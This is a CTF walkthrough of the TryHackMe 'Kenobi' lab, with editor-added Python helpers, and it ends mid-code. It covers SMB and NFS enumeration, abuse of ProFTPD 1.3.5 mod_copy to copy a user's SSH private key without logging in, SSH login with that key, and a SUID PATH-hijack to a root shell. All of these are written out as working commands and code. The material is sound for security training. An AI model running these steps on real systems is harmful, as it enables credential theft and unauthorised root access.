TryHackMe: Kenobi Writeup

Writeup and notes for the TryHackMe room Kenobi.

Task 1: Deploy the vulnerable machine

Scan the machine with nmap, how many ports are open?

nmap -Pn 10.10.12.187
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -Pn 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:48 EDT
Nmap scan report for 10.10.12.187
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 27.74 seconds

The answer is 7.

Task 2: Enumerating Samba for shares

Using the nmap command above, how many shares have been found?

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.12.187
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:52 EDT
Nmap scan report for 10.10.12.187
Host is up (0.20s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.12.187\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.187\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.187\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 29.82 seconds

The answer is 3.
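The three shares above are not equally useful: IPC$ is the named-pipe share every Samba host exposes, and print$ refuses anonymous access, so the one worth pulling is the disk share that a null session can read and write. The following is an added example (not part of the original writeup or of nmap) that parses the smb-enum-shares output above, kept inline as a constructed sample, and lists the disk shares anonymous users can reach, flagging the writable ones, since a share anyone can write to is also a place to plant files:

```python
"""Parse nmap's smb-enum-shares output and pick out shares a null session can use."""
import re

# Constructed sample: the script output from the scan above, kept verbatim so the
# parser can be checked offline.
SAMPLE = r"""Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.12.187\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.187\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.187\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""

# A share block starts with "\\host\share:" on its own line.
SHARE_HEADER = re.compile(r"^\\\\[^\\]+\\(?P<name>[^:]+):\s*$")

def parse_smb_enum_shares(text):
    """Return (meta, shares): meta holds top-level keys such as account_used,
    shares maps share name -> {field: value} for every \\host\share block."""
    meta, shares, current = {}, {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):          # only nmap script-output lines
            continue
        line = raw.lstrip("|_ ").rstrip()    # drop the "|" / "|_" gutter and indentation
        m = SHARE_HEADER.match(line)
        if m:
            current = m.group("name")
            shares[current] = {}
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if current is None:
            meta[key] = value                # e.g. account_used: guest
        else:
            shares[current][key] = value
    return meta, shares

def reachable_disk_shares(shares):
    """Disk shares (type STYPE_DISKTREE, so not the IPC$ pipe) that anonymous
    sessions can read; 'writable' marks the ones an attacker could also drop files on."""
    hits = []
    for name, fields in shares.items():
        if fields.get("Type") != "STYPE_DISKTREE":
            continue
        anon = fields.get("Anonymous access", "<none>")
        if "READ" not in anon and "WRITE" not in anon:
            continue
        hits.append({"share": name, "path": fields.get("Path", ""),
                     "writable": "WRITE" in anon})
    return hits

if __name__ == "__main__":
    meta, shares = parse_smb_enum_shares(SAMPLE)
    print(f"{len(shares)} shares enumerated as account '{meta.get('account_used')}'")
    for hit in reachable_disk_shares(shares):
        print(hit)
```

Feed it the saved output of `nmap -oN` from a real scan; account_used being guest confirms the enumeration ran as a null session, which is what makes the anonymous share's READ/WRITE meaningful.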

On most distributions of Linux smbclient is already installed. Let's inspect one of the shares. Using your machine, connect to the machine's network share. Once you're connected, list the files on the share. What file can you see?

smbclient //10.10.12.187/anonymous
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ smbclient //10.10.12.187/anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877092 blocks available
smb: \> 

The answer is log.txt.

You can recursively download the SMB share too. Submit the username and password as nothing: smbget -R smb://10.10.12.187/anonymous. Open the file on the share. There are a few interesting things found: information generated for Kenobi when generating an SSH key for the user, and information about the ProFTPD server.

smbget -R smb://10.10.12.187/anonymous

In my environment, running the command above did not download the files on the SMB share. It did not work with sudo either.

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ smbget -R smb://10.10.12.187/anonymous
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.12.187/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 seconds

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo smbget -R smb://10.10.12.187/anonymous
[sudo] password for kali: 
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.12.187/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 seconds
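The warning line explains the empty download: handle_name_resolve_order is the handler for the smb.conf parameter name resolve order, and the value it rejected is the share URL, so this build of smbget parsed -R as Samba's common -R/--name-resolve option and was left with no URL to fetch (the room text was written against an older smbget where -R meant --recursive). Spelling the option out as --recursive avoids the clash on either build. The following added example (editor's code, not from the writeup) reads the installed smbget's --help for the option names and builds the command line with long options only; the two help snippets are constructed stand-ins for an old and a new build, and the short letter --recursive carries on any given release is an assumption to verify with smbget --help:

```python
"""Build an smbget command line that survives the -R / --name-resolve clash."""
import re
import subprocess

def smbget_help(binary="smbget"):
    """Capture `smbget --help` from the installed build (option letters vary by Samba release)."""
    proc = subprocess.run([binary, "--help"], capture_output=True, text=True)
    return proc.stdout + proc.stderr

def recursive_flag(help_text):
    """Return ('--recursive', r_is_name_resolve).
    --recursive is spelled the same in every smbget build; the short letter is not, so the
    long form is what we emit. r_is_name_resolve is True when '-R' belongs to Samba's common
    --name-resolve option, the situation the warning above shows (the URL was swallowed as
    the name-resolve-order value)."""
    if not re.search(r"--recursive\b", help_text):
        raise RuntimeError("this smbget has no --recursive option")
    r_is_name_resolve = re.search(r"-R,?\s*--name-resolve", help_text) is not None
    return "--recursive", r_is_name_resolve

def smbget_argv(url, help_text, guest=True):
    """argv for a recursive anonymous download; --guest (-a) is the documented way to send
    no username/password instead of being prompted for them."""
    flag, _ = recursive_flag(help_text)
    argv = ["smbget", flag]
    if guest:
        argv.append("--guest")
    argv.append(url)
    return argv

# Constructed help snippets standing in for two builds (assumption: the exact wording of
# your build's --help differs; only the option spellings matter here).
OLD_HELP = """Usage: smbget [OPTION...]
  -R, --recursive         Recursively download files
  -a, --guest             Work as user guest
"""
NEW_HELP = """Usage: smbget [OPTION...]
  -r, --recursive                        Recursively download files
  -a, --guest                            Work as user guest
  -R, --name-resolve=NAME-RESOLVE-ORDER  Use these name resolution services only
"""

if __name__ == "__main__":
    try:
        help_text = smbget_help()          # real build if smbget is installed
    except FileNotFoundError:
        help_text = NEW_HELP               # otherwise show the command for the newer layout
    print(" ".join(smbget_argv("smb://10.10.12.187/anonymous", help_text)))
```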

What port is FTP running on?

The answer is 21.

Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve. In our case, port 111 is access to a network file system. Let's use nmap to enumerate this: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187. What mount can we see?

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.187
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 09:07 EDT
Nmap scan report for 10.10.12.187
Host is up (0.18s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds

The answer is /var.

Task 3: Gain initial access with ProFtpd

Let's get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. What is the version?

nc 10.10.12.187 21
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nc 10.10.12.187 21                                               
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.12.187]

The answer is 1.3.5.

We can use searchsploit to find exploits for a particular software version. Searchsploit is basically just a command line search tool for exploit-db.com. How many exploits are there for the ProFTPd running?

searchsploit ProFtpd 1.3.5
┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ searchsploit ProFtpd 1.3.5
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                        | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                              | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                                                                                                          | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                        | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The answer is 4.

We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands. We knew that the /var directory was a mount we could see (task 2, question 4). So we've now moved Kenobi's private key to the /var/tmp directory.

nc 10.10.12.187 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

After connecting to the FTP port of the target machine 10.10.12.187, the commands above copy the SSH private key /home/kenobi/.ssh/id_rsa on 10.10.12.187 to /var/tmp/id_rsa on the same machine. No login is needed; the destination is chosen inside /var because that directory is the NFS export found in Task 2, so the copy can be read back from outside.

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ nc 10.10.12.187 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.12.187]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
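The same exchange as an added Python example (editor's code, not the writeup's nc session or the exploit-db scripts): it reads the banner, sends SITE CPFR and SITE CPTO, and judges success by the reply codes (350 followed by 250) instead of eyeballing the text. The fake server it talks to is a constructed stand-in for the control channel of a ProFTPD 1.3.5 with mod_copy, so the code runs offline; against the real target you pass its address and port 21. Stopping after a 4xx/5xx reply is the practical detail: a CPFR that fails (for example 550 when the source path does not exist or the daemon cannot read it) must not be followed by a CPTO.

```python
"""Drive the ProFTPD SITE CPFR/CPTO exchange by hand and check each reply code."""
import re
import socket
import threading

def read_reply(rf):
    """Return (code, text) for one FTP reply; joins multi-line replies ('123-' ... '123 ')."""
    first = rf.readline()
    if not first:
        raise ConnectionError("server closed the control connection")
    code = first[:3]
    lines = [first.rstrip(b"\r\n").decode("latin-1")]
    if first[3:4] == b"-":
        while True:
            more = rf.readline()
            if not more:
                raise ConnectionError("connection dropped inside a multi-line reply")
            lines.append(more.rstrip(b"\r\n").decode("latin-1"))
            if more.startswith(code + b" "):
                break
    return int(code), "\n".join(lines)

def banner_version(banner):
    """Version string from '220 ProFTPD 1.3.5 Server (...)', or None if not ProFTPD."""
    m = re.search(r"ProFTPD (\S+) Server", banner)
    return m.group(1) if m else None

def mod_copy(host, port, src, dst, timeout=5.0):
    """Send SITE CPFR src then SITE CPTO dst (no USER/PASS: mod_copy accepted them pre-auth).
    Returns (banner, [(command, code, text), ...]); stops at the first 4xx/5xx so a failed
    CPFR is not followed by a CPTO that can only answer 'Bad sequence of commands'."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rf = s.makefile("rb")
        code, banner = read_reply(rf)
        if code != 220:
            raise RuntimeError(f"unexpected greeting: {banner}")
        replies = []
        for cmd in (f"SITE CPFR {src}", f"SITE CPTO {dst}"):
            s.sendall(cmd.encode("latin-1") + b"\r\n")
            code, text = read_reply(rf)
            replies.append((cmd, code, text))
            if code >= 400:
                break
        s.sendall(b"QUIT\r\n")
        return banner, replies

def copied(replies):
    """True only when CPFR answered 350 and CPTO answered 250, as in the session above."""
    return [code for _, code, _ in replies] == [350, 250]

def start_fake_proftpd(existing):
    """Constructed stand-in for a ProFTPD 1.3.5 control channel with mod_copy (a test
    double, not the real daemon). `existing` is the set of server-side paths that exist.
    Serves one client on 127.0.0.1 and returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        rf = conn.makefile("rb")
        pending = None
        try:
            conn.sendall(b"220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [127.0.0.1]\r\n")
            while True:
                line = rf.readline().decode("latin-1").rstrip("\r\n")
                verb, _, rest = line.partition(" ")
                sub, _, path = rest.partition(" ")
                if not line or verb.upper() == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                if (verb.upper(), sub.upper()) == ("SITE", "CPFR"):
                    if path in existing:
                        pending = path
                        conn.sendall(b"350 File or directory exists, ready for destination name\r\n")
                    else:
                        conn.sendall(f"550 {path}: No such file or directory\r\n".encode("latin-1"))
                elif (verb.upper(), sub.upper()) == ("SITE", "CPTO"):
                    if pending is None:
                        conn.sendall(b"503 Bad sequence of commands\r\n")
                    else:
                        existing.add(path)          # the copy now "exists" on the server
                        pending = None
                        conn.sendall(b"250 Copy successful\r\n")
                else:
                    conn.sendall(b"500 Unknown command\r\n")
        except OSError:
            pass                                    # client hung up; nothing left to do
        finally:
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port

if __name__ == "__main__":
    port = start_fake_proftpd({"/home/kenobi/.ssh/id_rsa"})
    banner, replies = mod_copy("127.0.0.1", port, "/home/kenobi/.ssh/id_rsa", "/var/tmp/id_rsa")
    print(banner, "-> version", banner_version(banner))
    for cmd, _, text in replies:
        print(">", cmd)
        print("<", text)
    print("copied:", copied(replies))
```

The banner check is deliberately separate from the copy: version 1.3.5 is what the page observed, but the only reliable test for mod_copy being present and usable is the 350/250 pair itself.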

Let's mount the /var/tmp directory to our machine: mkdir /mnt/kenobiNFS; mount 10.10.12.187:/var /mnt/kenobiNFS; ls -la /mnt/kenobiNFS. We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi's account. What is Kenobi's user flag (/home/kenobi/user.txt)?

mkdir /mnt/kenobiNFS
mount 10.10.12.187:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

The commands above mount the directory /var exported by the target machine 10.10.12.187 onto /mnt/kenobiNFS on the local machine and list its contents.

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ sudo mount 10.10.12.187:/var /mnt/kenobiNFS

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -la /mnt/kenobiNFS 
total 56
drwxr-xr-x 14 root root  4096 Sep  4  2019 .
drwxr-xr-x  3 root root  4096 Mar 17 09:23 ..
drwxr-xr-x  2 root root  4096 Sep  4  2019 backups
drwxr-xr-x  9 root root  4096 Sep  4  2019 cache
drwxrwxrwt  2 root root  4096 Sep  4  2019 crash
drwxr-xr-x 40 root root  4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff 4096 Apr 12  2016 local
lrwxrwxrwx  1 root root     9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root avahi 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail  4096 Feb 26  2019 mail
drwxr-xr-x  2 root root  4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root     4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root  4096 Jan 29  2019 snap
drwxr-xr-x  5 root root  4096 Sep  4  2019 spool
drwxrwxrwt  6 root root  4096 Mar 17 09:16 tmp
drwxr-xr-x  3 root root  4096 Sep  4  2019 www

cp /mnt/kenobiNFS/tmp/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.12.187

The commands above:

  1. copy the SSH private key /var/tmp/id_rsa, placed there in the previous question, into the current directory on the local machine;
  2. set appropriate permissions on the private key;
  3. connect to the target machine 10.10.12.187 over SSH using that private key.

If you try to connect over SSH without first setting appropriate permissions on the private key, an error like the following occurs:

Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.12.187's password: 

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l  /mnt/kenobiNFS/tmp/id_rsa
-rw-r--r-- 1 kali kali 1675 Mar 17 09:16 /mnt/kenobiNFS/tmp/id_rsa

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l id_rsa
-rw-r--r-- 1 kali kali 1675 Mar 17 09:27 id_rsa

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ file id_rsa
id_rsa: PEM RSA private key

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ssh -i id_rsa kenobi@10.10.12.187
The authenticity of host '10.10.12.187 (10.10.12.187)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.12.187' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.12.187's password: 

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ chmod 600 id_rsa

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ls -l id_rsa
-rw------- 1 kali kali 1675 Mar 17 09:27 id_rsa

┌──(kali㉿kali)-[~/Documents/TryHackMe/Kenobi]
└─$ ssh -i id_rsa kenobi@10.10.12.187
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ 

SSH login to the target machine succeeded. All that remains is to read /home/kenobi/user.txt.

kenobi@kenobi:~$ cat /home/kenobi/user.txt
d0b0f3f53b6caa532a83<REDACTED>

Task 4: Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous; some binaries such as passwd need to be run with elevated privileges (as it's resetting your password on the system), however other custom files that have the SUID bit can lead to all sorts of issues. To search the system for these types of files run the following: find / -perm -u=s -type f 2>/dev/null. What file looks particularly out of the ordinary?

find / -perm -u=s -type f 2>/dev/null
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

The answer is /usr/bin/menu.

The file is also owned by root, and the s in rws confirms the set-uid bit:

kenobi@kenobi:~$ ls -l /usr/bin/menu
-rwsr-xr-x 1 root root 8880 Sep  4  2019 /usr/bin/menu

Run the binary, how many options appear?

kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

The answer is 3.

Strings is a command on Linux that looks for human-readable strings in a binary. This shows us the binary is running commands without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname). As this file runs with the root user's privileges, we can manipulate our path to gain a root shell. We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, it's using our path variable to find the "curl" binary, which is actually a version of /usr/sh; as well as this file being run as root, it runs our shell as root!

I ran strings on /usr/bin/menu, the binary found in the previous question.

kenobi@kenobi:/tmp$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2

~~ SNIPPED ~~

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig

~~ SNIPPED ~~

.jcr
.dynamic
.got.plt
.data
.bss

Three hard-coded commands can be seen:

  • curl -I localhost
  • uname -r
  • ifconfig

Running /usr/bin/menu and choosing 1 (status check) apparently runs curl -I localhost, choosing 2 (kernel version) runs uname -r, and choosing 3 (ifconfig) runs ifconfig.

Also, none of these commands is given with a full path.
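An added example (editor's code, not the writeup's) that automates the two steps just walked through: find set-uid files the way find / -perm -u=s -type f does, then pull strings(1)-style runs from each and keep those whose first word is a bare command name that resolves on PATH. make_lab builds a constructed fixture, a fake set-uid menu whose bytes embed the same command strings seen above plus stub curl/uname/ifconfig executables, so the run is reproducible offline. The result is a heuristic (it cannot tell whether a string is actually handed to system()), but it surfaces exactly the pattern that makes /usr/bin/menu exploitable.

```python
"""Triage set-uid binaries: find them, then list command strings they run without a path."""
import os
import re
import shutil
import stat
import string
import tempfile

def find_suid(root):
    """Like `find ROOT -perm -u=s -type f`: regular files with the set-uid bit, plus owner uid."""
    found = []
    for dirpath, _, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return found

_PRINTABLE = frozenset(string.printable.encode()) - frozenset(b"\t\n\r\x0b\x0c")

def strings(data, min_len=4):
    """Printable runs of at least min_len bytes, like strings(1)."""
    run = bytearray()
    for byte in data:
        if byte in _PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_len:
        yield run.decode("ascii")

# A string such as "curl -I localhost": bare command word first, no leading slash.
_BARE_COMMAND = re.compile(r"^(?P<cmd>[a-z][a-z0-9_.+-]*)(\s+\S.*)?$")

def unqualified_commands(binary, search_path=None):
    """Strings in `binary` whose first word is a bare name that resolves on PATH.
    These are the PATH-hijack candidates if the program passes them to system()/popen()."""
    search_path = os.environ.get("PATH", "") if search_path is None else search_path
    with open(binary, "rb") as fh:
        data = fh.read()
    hits = []
    for s in strings(data):
        m = _BARE_COMMAND.match(s)
        if m and shutil.which(m.group("cmd"), path=search_path):
            hits.append(s)
    return hits

def triage(root, search_path=None):
    """For every set-uid file under root: (path, owner uid, unqualified command strings)."""
    return [(path, uid, unqualified_commands(path, search_path)) for path, uid in find_suid(root)]

def make_lab():
    """Constructed fixture (not a real system): a fake set-uid 'menu' embedding the strings
    seen above, a non-set-uid file that must be ignored, and a PATH dir with tool stubs."""
    root = tempfile.mkdtemp(prefix="suidlab-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for tool in ("curl", "uname", "ifconfig"):
        stub = os.path.join(bindir, tool)
        with open(stub, "w") as fh:
            fh.write("#!/bin/sh\necho stub\n")
        os.chmod(stub, 0o755)
    menu = os.path.join(root, "menu")
    with open(menu, "wb") as fh:
        fh.write(b"\x7fELF\x02\x01\x01" + b"\x00" * 8
                 + b"** Enter your choice :\x00curl -I localhost\x00uname -r\x00ifconfig\x00"
                 + b"/usr/bin/uname -a\x00libc.so.6\x00GLIBC_2.2.5\x00")
    os.chmod(menu, 0o4755)                           # set-uid bit, like /usr/bin/menu
    helper = os.path.join(root, "helper")
    with open(helper, "wb") as fh:
        fh.write(b"uname -r\x00")
    os.chmod(helper, 0o755)                          # executable but not set-uid: not reported
    return {"root": root, "bindir": bindir, "menu": menu}

if __name__ == "__main__":
    lab = make_lab()
    for path, uid, cmds in triage(lab["root"], lab["bindir"]):
        print(f"{path} (owner uid {uid}): {cmds}")
```

On a real host call triage("/") with the default PATH; the owner uid matters because a set-uid file owned by an unprivileged user is far less interesting than one owned by root. Confirm any hit with strace -f -e execve before relying on it.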

So, for example, if we save a malicious file under the name curl, add the directory containing it to the PATH variable, and run /usr/bin/menu, the malicious curl is executed with root privileges instead of the legitimate one (because /usr/bin/menu is owned by root and has the SUID bit set).

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH

The commands above create a file named curl in /tmp whose only content is the line /bin/sh, make it executable, and put /tmp at the front of PATH. The file has no shebang, so when menu runs its command through the shell and the shell finds /tmp/curl, execve fails with ENOEXEC and the shell falls back to interpreting the file as a script, which launches /bin/sh. On Ubuntu /bin/sh is dash, which keeps whatever privileges it inherits; if /bin/sh were bash, a shell whose effective uid differs from its real uid would drop back to the real uid unless started with -p.

In this state, running /usr/bin/menu and choosing 1 (status check) executes the malicious /tmp/curl instead of the legitimate /usr/bin/curl.

kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ 
kenobi@kenobi:/tmp$ 
kenobi@kenobi:/tmp$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

The shell is running as root. Note that id reports uid=0, the real uid and not just an effective uid, so the binary evidently sets the real uid to root before running the command; the group is still kenobi's.

What is the root flag (/root/root.txt)?

Just run cat /root/root.txt in the root shell that was started.

# ls -l /root/root.txt
-rw-r--r-- 1 root root 33 Sep  4  2019 /root/root.txt
# cat /root/root.txt    
177b3cd8562289f373827<REDACTED>

When adding a directory to PATH, put it at the front, not the end

In Task 4, when /tmp was added to PATH, it was added at the front of the variable, like this:

export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

This actually matters quite a bit. Suppose /tmp had instead been appended to the end of PATH, like this:

export PATH=$PATH:/tmp
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/tmp

In this state, running /usr/bin/menu executes the legitimate /usr/bin/curl rather than /tmp/curl, because when a command is run without a full path the shell searches the directories listed in PATH in order, starting from the first.

In the example above, /usr/bin/curl is found and executed before /tmp/curl is ever reached.

In an attack scenario you almost always want your own payload to run instead of the legitimate program, so add the directory to the front of PATH, not the end.
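The following added example (editor's code, not from the writeup) demonstrates the point of this section and of the Task 4 hijack with stand-ins: a fake system directory holding a legitimate curl and a menu script that runs curl -I localhost without a path, and a fake /tmp holding the attacker's curl. Nothing here is set-uid, so the shell you get is your own; the lookup order is what it shows. With the attacker's directory first on PATH the hijacked curl runs; with it last, the legitimate one does, and shutil.which with the same PATH strings resolves the name the same way statically.

```python
"""Show why the writable directory must be prepended to PATH, not appended."""
import os
import shutil
import subprocess
import tempfile

def make_script(directory, name, body):
    """Write an executable /bin/sh script and return its path."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o755)
    return path

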